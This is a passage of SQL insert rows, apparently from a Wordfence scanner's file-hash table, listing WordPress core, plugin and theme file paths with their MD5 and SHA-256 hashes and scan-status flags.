(0x10c39f417f8fc66f9596e7c8264ec5b4, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_meta.php', 0, 0xfcc44c8b628b5e0d8449ab9122c988bf, 0xfcc44c8b628b5e0d8449ab9122c988bf, 0xc6c5352caf7b27b53317c4a152e6ba7f7ebc6e756e0534b295ed3e1371f25ccb, '', 0, '?'),
(0x10c62726e43cc5454fda82c356625916, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_carousel_cat.php', 0, 0xdf14af117e2e3582c1889a98d0ca558b, 0xdf14af117e2e3582c1889a98d0ca558b, 0xbd4d109d5e8224507e35e08a308ede37d977ebe9f89a9da63e27a5119291e5d6, '', 0, '?'),
(0x10c9e8eb133a7f6da1b05bdda2af3a23, 'wp-includes/l10n.php', 1, 0x00000000000000000000000000000000, 0xb2d26e72a3cbc753fb221d5c49006d73, 0xf6899ddb182f585052fe7e501a3c065dc08e403a9dd942172efdc0741989d845, '', 0, '?'),
(0x10cf4915a2d85c6ab6acd178cccdcb67, 'wp-admin/images/date-button-2x.gif', 1, 0x00000000000000000000000000000000, 0xc28b3fbea9a861b430fdd7394a511a96, 0x9f1d04add32a01ac51adbae80bda5f28473a2a80cafdceb764faebe3eeeae02e, '', 0, '?'),
(0x10de5d50aa4a51c680366fd6a2f7953b, 'wp-includes/Requests/Exception/HTTP/428.php', 1, 0x00000000000000000000000000000000, 0x9a97bb0369f70142e4e57da75eae742a, 0x43ea4fb85725930caea474df8fde5912d77cc215d5268b0f309d56c28cd05ccc, '', 0, '?'),
(0x10e9e1e66a37725bbc2c94ccfc5ad6e8, 'wp-admin/upgrade.php', 1, 0x00000000000000000000000000000000, 0x3491f1fbbaba178a6c2b6c6ce357ef3c, 0x766d8dafdb541e766b7e041b9297d3d34a3b82a42269bb711ba7a98ebe6d4168, '', 0, '?'),
(0x10f3141b6808819656310f78625d06dc, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_clear_all_24px.svg', 0, 0xe2e16e34ad48327f7feb759b907ba85b, 0xe2e16e34ad48327f7feb759b907ba85b, 0xc6fb09b930fad837adfcc1535fd24ceef2e68d30023cabc257821d0bf508f8c7, '', 0, '?'),
(0x110c349b8e42d60037716f42c76f36ed, 'wp-includes/blocks/rss.php', 1, 0x00000000000000000000000000000000, 0x4dd78a44ab36140c720933aa1addb0cd, 0xe05404d9c04bcaa215ec47d8d156b669f8e37dcfe545c7de13620ea30aead29c, '', 0, '?'),
(0x111a0708931cea6c6db7f08b9440f8f8, 'wp-includes/customize/class-wp-customize-date-time-control.php', 1, 0x00000000000000000000000000000000, 0x1e6579c5bcd44fb43be75149ee1c683e, 0x0861d76f0da9a2a43211a2e3446ce332d1465be3255724530503e2628d95a34c, '', 0, '?'),
(0x111bc42db2b00727678bab8d50f75cac, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php', 1, 0x00000000000000000000000000000000, 0x399e56c6081f23d2b91190ebdb340b80, 0x47709a66b81cf848768e869e9f1ae6f3788b388318feaaa33143b0145bce3441, '', 0, '?'),
(0x112957c4f0255daa21de143bb0fdd57a, 'wp-content/plugins/js_composer/include/templates/pages/partials/_tabs.php', 0, 0x252c095483d6b29915c4e6bb8d79519f, 0x252c095483d6b29915c4e6bb8d79519f, 0x673032f9b0a7e01eb224977aaea511cd89a549265301a67a46d2b2f0a3f0ea96, '', 0, '?'),
(0x1144a9386846de9b4256690552eea81b, 'wp-admin/css/colors/blue/colors-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xc9d0a313c14133dae9c0e10a6b85e6b2, 0xc1be55ff102fc414c3dd97c76c9c2742b49e3a3870db9c4e96a686a4d2f3f1b1, '', 0, '?'),
(0x114c749e861bba36166ae738ce273228, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-checkmark.svg', 0, 0xeaf723625c310103439757f10596a599, 0xeaf723625c310103439757f10596a599, 0xcb51d2c06af9eb069f146c2072e99ee1691f7600f5994d15c52b7eafbab10f33, '', 0, '?'),
(0x115c9013a0dc80d9a072ef690c74a1b3, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_right_24px.svg', 0, 0x771ec4a89d729877a78beb900710f7e6, 0x771ec4a89d729877a78beb900710f7e6, 0xf43801b1c224bcd8cad742401b8719e062dd02dbd2665face4a6c032c0e78ad7, '', 0, '?'),
(0x116ad7bbfd8204f3712ebb2a3ba7e132, 'wp-admin/css/colors/sunrise/colors-rtl.css', 1, 0x00000000000000000000000000000000, 0x15a1fe1b601c5da6101f06d6430671d0, 0x0e94b563445ddf50b641a01fbcb8cd876e9dc589f96ecbdf61323118e419b89f, '', 0, '?'),
(0x116c8202cc218944ac29e534ef03a416, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator2.svg', 0, 0x608a00cff8570250f2ce9b08c1cf24f5, 0x608a00cff8570250f2ce9b08c1cf24f5, 0xac31b041abbbde004b3b9c748d8ffb9b55720582a0f156b0f8271aa3818f45ea, '', 0, '?'),
(0x11710c6648961fbdb63cec4f0ca9c63b, 'wp-content/plugins/js_composer/include/classes/editors/class-vc-backend-editor.php', 0, 0x32b7df873040254acf310bc598f571fa, 0x32b7df873040254acf310bc598f571fa, 0x2d3f8b968d818e110c3d72f1d6afc38566bcd1644c987c866217372986b7faa0, '', 0, '?'),
(0x1177916573c5cf693cb54fd84a2517c1, 'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php', 1, 0x00000000000000000000000000000000, 0x6a79127e8481dad12e6d8b98f9021b4e, 0xd0877bfa4c7b3d282de3bbc7a6b1afd429e8eeb5c79e0e31a5082e06beb55bb5, '', 0, '?'),
(0x1178d574f439c7eabb986a10a22139a8, 'wp-content/themes/Impreza/framework/templates/form/info.php', 0, 0x3292211592fe422f2024bd41b7f35fd3, 0x3292211592fe422f2024bd41b7f35fd3, 0xea87a9a52f1e7418ffc845a3393122906760d2dfb6b65f99dda5e2d731b7c4f8, '', 0, '?'),
(0x117ffc52cbc92e89d108453e3393481d, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_frames_24px.svg', 0, 0x8d25b444eed4ef5b4b287165602f8b23, 0x8d25b444eed4ef5b4b287165602f8b23, 0x9f5e94c34bf75d3fd5347ec2f1e416fc912a71ba085ee680b29a62acf572a3fb, '', 0, '?'),
(0x1181c4bdef3a9da1cfe7a54e27cba9bc, 'wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1579191227.js', 1, 0x00000000000000000000000000000000, 0x38399d22ebee7a7af8c256762aced85d, 0xabdb8625256ced3a4ac4663cc86271e3c5509d96c2507419cbaf7ddf9d22d566, '', 0, '?'),
(0x11823e1073be8d30b0609d5bb34bd42c, 'wp-content/plugins/revslider/public/assets/js/jquery.themepunch.enablelog.js', 0, 0xf846c7bfef1815dc6f91c9c392336b9e, 0xf846c7bfef1815dc6f91c9c392336b9e, 0x021f6ef06d54a383197c29599d811467cac7c64f75adaee741447e9076d98010, '', 0, '?'),
(0x1191d4b88003a2251a44e98e79f3b35a, 'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb', 1, 0x00000000000000000000000000000000, 0x7da8a120fce4e3379245c48536c746cd, 0x08141ca037cde31d4b34de49db04f7e8965377dd92bb9acd5d04b951b6a5d2de, '', 0, '?'),
(0x1197c7b9d1b3e802a277cd86b1161e8d, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_flip_box.php', 0, 0xde457038455b3d871727e9980ce2474a, 0xde457038455b3d871727e9980ce2474a, 0xe15d95d4b250c66a89f3d438c2b805d63ef59bf414214931112efbcf0599fd4f, '', 0, '?'),
(0x11a45af2f7f3642a96e859a1f6da98a1, 'wp-content/plugins/wordfence/views/options/block-all-options-controls.php', 1, 0x00000000000000000000000000000000, 0x393549ff1842197f848a2261017fe3cf, 0x56a7e147339805eeff14161b3752a39f28f1c0dd40ab0a2c0aa10985faf8778d, '', 0, '?'),
(0x11a58c6675278fe35f5cd1b02f6b5d30, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_remote_24px.svg', 0, 0x7e972c9d4cfe3c430b8f4f703af071ac, 0x7e972c9d4cfe3c430b8f4f703af071ac, 0x8cc7a536959a5ff5527e402e835597a7afe14cf6ea70939a83f2af6155ca1969, '', 0, '?'),
(0x11b1d38e417d07d28e575a353d2a749e, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php', 1, 0x00000000000000000000000000000000, 0xea623b76279567c2d1017e949eaeaf6b, 0x6de821c44d8096174a22768f043e2cf4e4ed30ee00d59cc9abb220266ad990e0, '', 0, '?'),
(0x11c62c6e34aa6f2bbc6cabdb68956d72, 'wp-content/plugins/wordfence/css/fullLog.1579191227.css', 1, 0x00000000000000000000000000000000, 0x65c92e698b6015ab83ce81be55e7b976, 0x3ff53efcb03f68f4cebe5bb5c2b2ef50d8758f7bdb7075fa6102a0fe898b0e61, '', 0, '?'),
(0x11d272881f57eaae33a899e3e1a5be56, 'wp-admin/css/color-picker-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x3a59db8bd48105485439d60f7ac0724f, 0xa260091cdd99a9f82b44f50f5cef6491f1cd1cb3bce6fec6bc9287fa3007bc8f, '', 0, '?'),
(0x1203141c3a32da6d368e80a332be5756, 'wp-content/plugins/Ultimate_VC_Addons/classes/ultimate_helper.php', 0, 0xd92cbbafd95151500e395d505f634f3d, 0xd92cbbafd95151500e395d505f634f3d, 0xeb37ae262c0723b0912252a0cfcf69a4dbbb168caf73488fcd367cd47cc69620, '', 0, '?'),
(0x120d7b9e1232f754b50d1290c47630b5, 'wp-content/plugins/revslider/admin/assets/images/sources/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x12121d418c6d010be24e4f811c3fe2cb, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_in_page_24px.svg', 0, 0xf25eca9e7cf5ee3f3d4f309011e93230, 0xf25eca9e7cf5ee3f3d4f309011e93230, 0x53229432c88b3a1ba26135a1f370055d433c3ae2467da184f9b8dcbde7295e82, '', 0, '?'),
(0x121affe5ae5b082aa0e3f7b403cf7e37, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_24px.svg', 0, 0x33ba6389b356fa1b7e9fc1cf4c6a98de, 0x33ba6389b356fa1b7e9fc1cf4c6a98de, 0x2e7eda8c117c6e78958089f6cf653a9254d6e8154508984417c18c4f01f8525b, '', 0, '?'),
(0x122166f38a4800c351510133b4a8823a, 'wp-content/plugins/Ultimate_VC_Addons/modules/utlimate-tab-backend.php', 0, 0xe66438869ee47695c994c27c0ff304c8, 0xe66438869ee47695c994c27c0ff304c8, 0xaa812df50e8049ff32a1d00692b12dabd882d68f2611abb35536f3d324ea5f89, '', 0, '?'),
(0x12231f96054b4264045b5c43659fdc32, 'wp-content/plugins/wp-super-cache/plugins/awaitingmoderation.php', 1, 0x00000000000000000000000000000000, 0xa1ed2ca3abaa20bec282f61e60b9a0ea, 0xcd015c548b14cb3997eb4aa415e196d8c1e046776a367ec9ec7ac9054dd1b805, '', 0, '?'),
(0x1230eb86d2e0719f40d447366b9fc6d5, 'wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/css/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x123ab25890e632ec4dd3fed67efbc818, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg', 1, 0x00000000000000000000000000000000, 0xa2a1f732cc34764c684ed521c6f3327c, 0xafc2cb33694128d60cade670ed02e7089647448effda94ee05f0b4f7a3ef1dc1, '', 0, '?'),
(0x124cd6c4fcfd38e0ef80f55ca8ddbc2b, 'wp-admin/images/imgedit-icons-2x.png', 1, 0x00000000000000000000000000000000, 0x2ce3ee2783a33655a6bdfd9dc3cce174, 0x933fe0d88e299d2e6ca014f4d0178dcf25b83cb2288f5fda201b36ff605e6337, '', 0, '?'),
(0x126dd417c3b1857e0696f6f25217a53f, 'wp-content/plugins/wordfence/views/tools/options-group-2fa.php', 1, 0x00000000000000000000000000000000, 0xf9bb4fa44eb9dafdd36a94d450761f34, 0x6dc35d6e3ebbafa1826e7f46663bf10fc947662d6d5f4c1b949f063462e28227, '', 0, '?'),
(0x1270db9ed4324e1c3c3a5aa537bb7282, 'wp-includes/js/tw-sack.js', 1, 0x00000000000000000000000000000000, 0xb989a5bd84f6ebcbc1393ec003e6e991, 0x7ba26e5d14d600d68898dd6e7fbb0dcf11b5f4c93ca70e77cbb7582983e0da3a, '', 0, '?'),
(0x12746c5e6983149b6d835fe2ccf6c925, 'wp-content/plugins/js_composer/include/templates/editors/partials/templates_search.tpl.php', 0, 0xf5975fdb93a7d514f9df5e6b5541cf8a, 0xf5975fdb93a7d514f9df5e6b5541cf8a, 0x8a8627e63b46ab3c8c644daa29848a68227e35881cb0faf2530a13ab93fdf8b0, '', 0, '?'),
(0x12758c293803464739a143b0289db69a, 'wp-includes/js/wp-ajax-response.min.js', 1, 0x00000000000000000000000000000000, 0xe42f27d6179a5d518c8a5fd7c6685926, 0xce20e341e36aee097e0e72d4630ead64b930e6b47a6725d4a59932ce1753774f, '', 0, '?'),
(0x12a1c360ac846684188539cf2897a8ae, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure05.svg', 0, 0x8560ffb1825000d86d929925c1769f0b, 0x8560ffb1825000d86d929925c1769f0b, 0x47cdab7e48b4f9fb98a7d7270a112d921e8779a48a8d60916562614c0251b6be, '', 0, '?'),
(0x12a9acb3f4913901c47e007b40d9dbf2, 'wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php', 1, 0x00000000000000000000000000000000, 0x2c8b2952d471a2c679bb7cb4ad34842e, 0xf0a12555a63c1447d748abcbe65be3d12e2165cb82742c67988fe40373c98402, '', 0, '?'),
(0x12aacb882d58e824f497edb0f4c90825, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_italic_24px.svg', 0, 0xffb4dace909f14de1d4bf6616bdcb684, 0xffb4dace909f14de1d4bf6616bdcb684, 0xa7db18d8b5a7295d0f8b64fcefac19dc2428675be9a30cb5c25bb55576c4fb8a, '', 0, '?'),
(0x12b8b7e1436c6fa6081eb6b196afe9d2, 'wp-admin/nav-menus.php', 1, 0x00000000000000000000000000000000, 0x5aee659fc9ad101deae789e69a3849b1, 0xaab1c1b62d172b33910942dbe74b2d98f7ec06af9119d8a6c4e35474c877b3cb, '', 0, '?'),
(0x12be3e01eb439db25b6f5e4b51ac9dea, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-empty-space.svg', 0, 0x2eedc1887b16d725e165abb1ea548d24, 0x2eedc1887b16d725e165abb1ea548d24, 0x6052d1379ea3a1a913d63b3df9061f37f9150f55988f5d8da36b1d50868fe60b, '', 0, '?'),
(0x12bf5dffeb2f8e899e61a7f528977f77, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-line-chart.svg', 0, 0xcdc6c2ff0960bafbd4c2cfe7a998968b, 0xcdc6c2ff0960bafbd4c2cfe7a998968b, 0x7dd287b44c58c81db2cc7012f74460275b870039667c43f2ad7fdafca9c3740e, '', 0, '?'),
(0x12cc0727f807b74de5b0190c66f59916, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-revslider.php', 0, 0x92dc984d2e05363cf00dfac920623f28, 0x92dc984d2e05363cf00dfac920623f28, 0x8437eb4d327784cf6f4a6b27f0f51fbf5778cfd78019b824672cf85306477173, '', 0, '?'),
(0x12cc66aed792c3a826a97e24c5b67389, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pageview_24px.svg', 0, 0x452e7a028ef8c9bca8be6f794912bb13, 0x452e7a028ef8c9bca8be6f794912bb13, 0x834090a5435d8a234ec8e5de625dc964e8dd36228caebd1d3217f0bdadc721bd, '', 0, '?'),
(0x12d1af30e67353d50ed59a55f829140b, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_motorcycle_24px.svg', 0, 0xc503bd3e461ef80474d43b065d13fbe5, 0xc503bd3e461ef80474d43b065d13fbe5, 0x84ffd0e1affe9084ef7f08060f9879cde3cb37578b2834625fcdd4b9587eaf05, '', 0, '?'),
(0x12d36f3f1f0e0d4b86125af7b7ca0ec3, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_24px.svg', 0, 0x51fc99f795e283bd8451f67d74ef46c1, 0x51fc99f795e283bd8451f67d74ef46c1, 0xe9d4f5700b3f2b1452b6d798b446f61ce915da005330599902e860fd13ac282b, '', 0, '?'),
(0x12db2fbebf1ea5d39ee556e42f2ff051, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_giftcard_24px.svg', 0, 0xc8bee17ca30699a7734fc02334639f7f, 0xc8bee17ca30699a7734fc02334639f7f, 0x0f551fba62de54f91e4cd40fbfd111e9729e6724cf54295c77b7efe85eb358c7, '', 0, '?'),
(0x12e226fe0959d9747a28a11af801e680, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php', 1, 0x00000000000000000000000000000000, 0x6a2e5cc4302a8084d6095bb2bcce16cc, 0x66dc0e80ecff3885932721895246eb9518aed24cc2e618decb99145ed477e2d9, '', 0, '?'),
(0x12e6ceb7367cd86676e589a4537e495e, 'wp-content/plugins/revslider/admin/views/slider-overview.php', 0, 0xabd9791f67123213af8e7626f5ead5ca, 0xabd9791f67123213af8e7626f5ead5ca, 0x742e4823413198f438108d62f10b63948e5c5638062468958eda28f0cc122cce, '', 0, '?'),
(0x12fbd5cc5bab6d9a3ae05819092a96f5, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_balance_24px.svg', 0, 0xcb2e60b4c7e5790400811a24c566de9b, 0xcb2e60b4c7e5790400811a24c566de9b, 0xff4f321914ae101eed61fe75664761e5cbdca96c1422272527f4beba8d994a5d, '', 0, '?'),
(0x12fea5493cbdd6cd5518c2434d645aa4, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php', 1, 0x00000000000000000000000000000000, 0xa2560b0ea4f749de84c58c2e5f999c90, 0x8fd1916c691e15df89d8d61f2ed04e1c202f86d97369f6ad549ea16a21aaa36c, '', 0, '?'),
(0x12ffb42db986693e62738c0c7f9b31e9, 'wp-includes/js/jquery/ui/resizable.min.js', 1, 0x00000000000000000000000000000000, 0x449c1a605e8c304774ed6336d9a953af, 0x7575cc75344501f049cf78f7e2264885f59487e86e888f676f924eb5e343dd9d, '', 0, '?'),
(0x130415df282646da76c009deecd37dcd, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge02.svg', 0, 0xdc2dcb512e3171e34be137bafc921c3d, 0xdc2dcb512e3171e34be137bafc921c3d, 0x35ed492715a6614db80a1ebac749053ca6db993d351baaf531f4c87e08bee4e8, '', 0, '?'),
(0x13126a81cda05bdb428afb131ac1ad67, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/puzzle.svg', 0, 0x528c64cbc15a2363526d8f715f013110, 0x528c64cbc15a2363526d8f715f013110, 0xf975ac991dfbaf3404f49ba4b36e9d5140469d916dc152b66834df988d3979a0, '', 0, '?'),
(0x131c53ad0a1cc461252644d5ce8924d8, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_people_outline_24px.svg', 0, 0x2c3af7a02ce3c65efe42f506cb566d7f, 0x2c3af7a02ce3c65efe42f506cb566d7f, 0xfb9df255d48b68bb79b9a9304639101fca7a9655c5707cd1209969926ab300f9, '', 0, '?'),
(0x133e693771200d12cb9dc91a47830b44, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_cloudy_24px.svg', 0, 0x9c4863fb17243a6bca4f8789bd1959e8, 0x9c4863fb17243a6bca4f8789bd1959e8, 0xa56b5ed7b75872b3aa2d09f03fcc315d2db9866f3aa53f14007ac73b8852e9c2, '', 0, '?'),
(0x134b0c6522c5649b02b136a5e9381149, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-plugins.php', 1, 0x00000000000000000000000000000000, 0x27e2358fc3dc93c2e9252ad73aea2200, 0x1d0e4fc880d699e9239870ce42e7b39f0a6479f93f6fe0d5d4d745628684dc99, '', 0, '?'),
(0x1383ac8ae4a4f623eb573bb7f9f4a9ac, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta.php', 0, 0x35d78930069cd6794ad79041342a002b, 0x35d78930069cd6794ad79041342a002b, 0x9e5050e9d2de1937926dbf63350a3d7365542d458b83b7504e14fa647dfe5e74, '', 0, '?'),
(0x1383b63472e88825dee3d3c96ab89e97, 'wp-includes/SimplePie/File.php', 1, 0x00000000000000000000000000000000, 0xaeba08ad6b558736ea0aaf2beb2925b7, 0x9291612ee92565fd35df2b06e070fbf418338b645e9d0f62138add4c4cf7b454, '', 0, '?'),
(0x1388de4b532ba11565d78e418640938a, 'wp-admin/css/colors/light/colors.scss', 1, 0x00000000000000000000000000000000, 0x480b9bd647e5b323ef88d63ce55e1d6f, 0x3f3d05cae4d28f1945871a4d9261d51058ffb684c4ba4a2273bce66b3bea0533, '', 0, '?'),
(0x138d0be590275132ca7db3d0d9726c07, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tour.svg', 0, 0xbaa56a6ac52b0215765e70b3f6bd7ae2, 0xbaa56a6ac52b0215765e70b3f6bd7ae2, 0x8a2cf5181a4908e9f5cb1449754974f2ac50cdc311391617ce308952e3fecc63, '', 0, '?'),
(0x139bbba0c60fed4665b1093504375be9, 'wp-content/plugins/wordfence/lib/email_newIssues.php', 1, 0x00000000000000000000000000000000, 0xab262801b52fe17877e0d058cea897a3, 0xae25a0f03a227c6a2157f572052c94a38cbc462f194b191cf9b79cee167e78cb, '', 0, '?'),
(0x13a2fdf10be7554e151d4541c867ef74, 'wp-includes/js/customize-selective-refresh.js', 1, 0x00000000000000000000000000000000, 0xd5e80910e6bcb047f36fa770e5af9b7a, 0x9fd59b267638f19d838144100dc2ef286be8e5fef01995ba228fd726a802a997, '', 0, '?'),
(0x13a40bbc3e17b1085cea4a61b18d8907, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_portrait_24px.svg', 0, 0x3053dcbcd8fee1f2425f363f217a1f45, 0x3053dcbcd8fee1f2425f363f217a1f45, 0x9cc33361a76aaf62020037482b2636eea3aecd3b284637a1a8de8dc1db13bb24, '', 0, '?'),
(0x13b1268479968f4ee6389d272591d061, 'wp-content/plugins/revslider/admin/views/templates/slide-general-settings.php', 0, 0x9cde93bff39fe4a551a26a1b5135564d, 0x9cde93bff39fe4a551a26a1b5135564d, 0x80b3b2d671032587385dbb29ad1f95a4258240a77e9739ef1ae9697e9a080844, '', 0, '?'),
(0x13c47e955b19c4b669877b2ca52c32ef, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_inbox_24px.svg', 0, 0x593842a12ca4747157d0e64d91013558, 0x593842a12ca4747157d0e64d91013558, 0xb5f8f60e3c39d03860a2fe2989b3ef198f15ef277eb2ad051bc6e752210dc308, '', 0, '?'),
(0x13cc1041c26fda21cc56e1eac5b36076, 'wp-content/wflogs/ips.php', 0, 0x6c43a40c1b64628def2ea7cbb4eb8376, 0x6c43a40c1b64628def2ea7cbb4eb8376, 0x5a5d5b578d128b509a7dc32cfbfebf969e8307372af671e4e10ae3e6c691a1e1, '', 0, '?'),
(0x13dc8d01767ab8d20913632a31246ee7, 'wp-content/plugins/js_composer/include/params/font_container/font_container.php', 0, 0x3f32bdf9ec840337dce1f11b9bdd71ae, 0x3f32bdf9ec840337dce1f11b9bdd71ae, 0x2002e675adddd64f7642c329ba68ec9405e5f039674a6b57031819fdb28c37df, '', 0, '?'),
(0x13e3fd95c5b4ea1ad864a3f77cb3f02b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart2.svg', 0, 0xcd782972e12ada0d4930b3892ef13067, 0xcd782972e12ada0d4930b3892ef13067, 0x638cfde3053e8afe2b5c4cbbcd9136300ada014ecfe485b766bae21d287c277a, '', 0, '?'),
(0x13e87fa83167f6f0adc3e562a7dbc59a, 'wp-content/themes/Impreza/framework/functions/widgets.php', 0, 0xd3b1799794b23f3cfd7dca58f0673384, 0xd3b1799794b23f3cfd7dca58f0673384, 0x62dc0fc0efe1a3e126e663c75e7d41f4bced7f823360cb1af451847f6581b417, '', 0, '?'),
(0x13fe9528a03b20c11784c4a6a3c86c30, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_3.php', 0, 0xcfa6be7214f436194e6317cf3c18a11e, 0xcfa6be7214f436194e6317cf3c18a11e, 0x0bc94e4f1ef12ad08f6d05f8aac11fa153678d5296a9b3d1120d348bdbc9b55d, '', 0, '?'),
(0x14206f8facc6959fcc745fafba002ecd, 'wp-content/plugins/wordfence/views/options/option-switch.php', 1, 0x00000000000000000000000000000000, 0x6db369d245b73e57a563159c5a616967, 0x9e26cbd2dbd5d59a12cb6a053a8367262a35db360679c9a864857134d6999ee6, '', 0, '?'),
(0x14257e574e3832bd9e51ad4fbf9bfe05, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php', 1, 0x00000000000000000000000000000000, 0x6e34a41e469abf304a43c6206eb2be6b, 0xbb43622c7fa88db32207d7223e066abbe4a617f28990c58a03ced8416c44179c, '', 0, '?'),
(0x142c66cf85e452ef6f9e891333f75ede, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_roll_24px.svg', 0, 0xd03b7afea0940d905b9159f4eb7e9ad5, 0xd03b7afea0940d905b9159f4eb7e9ad5, 0x39388517195c077f74339af2e0c59cc9ceed8b2a6040369c47f2570e1b6c2c61, '', 0, '?'),
(0x143fd96a351d307dce8b681bf2004d0e, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_size_24px.svg', 0, 0x78dc2fc85add2dd50446f0a9b442bb34, 0x78dc2fc85add2dd50446f0a9b442bb34, 0x0a793fdcbe8e25ee61c02c3439c4b27927a1bca264a23ba1e346dece2ffda395, '', 0, '?'),
(0x1445a9fd802e53fc7227b21a3117491d, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_schedule_24px.svg', 0, 0x9c0abe38bf6c7dae2bfc514783d0ff20, 0x9c0abe38bf6c7dae2bfc514783d0ff20, 0xa37e3260f5c9015b940cc3a9c0f9590652cc3acbd997cead3000232473b3f428, '', 0, '?'),
(0x1445fe190763636d275d3e5b0ee99e3a, 'wp-content/themes/Impreza/framework/config/addons.php', 0, 0xeb6da3b109db70a5ba3084d3cf219253, 0xeb6da3b109db70a5ba3084d3cf219253, 0x50f46be3f1e7ed886b8d0b36c30eefc75426ab984df485be95cdd1e5ed0c4997, '', 0, '?'),
(0x144a53d77af3df6480495dea1c082782, 'wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/ultimate-responsive.js', 0, 0xc3a9354cf10291189ef003c3ef61869c, 0xc3a9354cf10291189ef003c3ef61869c, 0x701d0b813912b90d799fe9ef40956c550bc00d5410cf9767c7f395a8235b7621, '', 0, '?'),
(0x145c9fa4d01ae98e6509cd299fd55570, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php', 1, 0x00000000000000000000000000000000, 0xc89148e41a7f62923e56ef44f6a25232, 0x72d19b4ad491492fe90a1e4f8b597d9c78189a82c586eb9410defa87c6105520, '', 0, '?'),
(0x146c8aca897e0a978e70d58916e5ff56, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_change_history_24px.svg', 0, 0x336a88cf82d2d57b36f5f3705e4bc5e1, 0x336a88cf82d2d57b36f5f3705e4bc5e1, 0x9beaacb5b4ba5a1c21e61fc207e59c9500177ea71e49852e449119988b8c7947, '', 0, '?'),
(0x147789c1c3fa2b1b00e398f2ec32ce52, 'wp-includes/sodium_compat/src/Core32/SecretStream/State.php', 1, 0x00000000000000000000000000000000, 0x1a6a6ff10098ba08792ca80c2a957d63, 0x327022576ae184158097ec0173e26c1f66265340c75bc7135c8baa2257c60810, '', 0, '?'),
(0x147c273f031b5daa302be20e458ed0d3, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_pageable.js', 0, 0x69403e78ce4719d95d15902871f8417c, 0x69403e78ce4719d95d15902871f8417c, 0x8f0b16b8363bdb3ec4ce5cfca470ba64f5be43e7183f4b98a8f23d78e525bf38, '', 0, '?'),
(0x148959a37433af0f4948a35c9fb17454, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/swatchbook.js', 0, 0x304c12115db1d9be8c477e66e3739069, 0x304c12115db1d9be8c477e66e3739069, 0x0317b1d95d6b14737934696a30654b175c579c6443682af9ab91e4871754e31d, '', 0, '?'),
(0x14a2fa7c23a740f34183c2e994b67ca7, 'wp-content/plugins/js_composer/include/autoload/class-vc-vendor-presets.php', 0, 0x88182e0729d89352016464f146adf31c, 0x88182e0729d89352016464f146adf31c, 0x4d08a784a958a405eae552fe74d2d2a8bc13048c46918fecd98b01f33b653044, '', 0, '?'),
(0x14a52d83e8040142f1f18f7c74535ebc, 'wp-includes/customize/class-wp-customize-nav-menu-section.php', 1, 0x00000000000000000000000000000000, 0x62540989ebe4ba014f392e36f30a2d80, 0xb0cb016c90f5dd09f39640c858fba7aac46e306685fe085e9857b6a6f47113f5, '', 0, '?'),
